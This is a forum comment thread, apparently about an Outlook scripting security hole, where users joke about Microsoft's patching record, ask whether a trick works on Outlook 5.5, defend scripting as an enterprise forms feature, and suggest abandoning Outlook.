Actually, I thought Microsoft's standard practice was to create enormous security holes in their products wait until the virus spread and caused $Millions - $Billions of damage before issuing a fix :)

Neat trick!

[operagost]

But does that work on 5.5? Your outgoing messages are dated on the server, not the local machine. Or do you have to be in remote mode?

The outlook scripting is for enterprise apps

[earache]

I do believe that Microsoft showed very little insight when including scripting capabilities

Maybe you should explore a little deeper and then you'd realize that the scripting/forms capability of Outlook (as well as Outlook in general) is meant for enterprise solutions. Bill, in the IT department, can put together a survey form or some other data gathering form for Greg, in the marketing department. They can then email this form to everyone in the enterprise. Everyone fills out the form and the responses get put in a database via outlook and exchange.

Alternately, you can use scripting/forms to write automated interfaces to mass company emails. June, in the PR department, sends out press release notifications to the company. Thanks to Bill, in the IT department, who wrote an outlook template form, June simply needs to type in some simple info and hit send, everything ready formatted to her liking.

Now couple this with calendaring, tasks, contacts, etc. and you start to see a valuable environment for enterprise development.

SO THIS IS THE REASON OUTLOOK INCLUDES SCRIPTING.

The *only* solution?

[xTown]

The article said that the only solution to the problem was to patch Outlook.

Wouldn't a better solution be to stop using Outlook completely?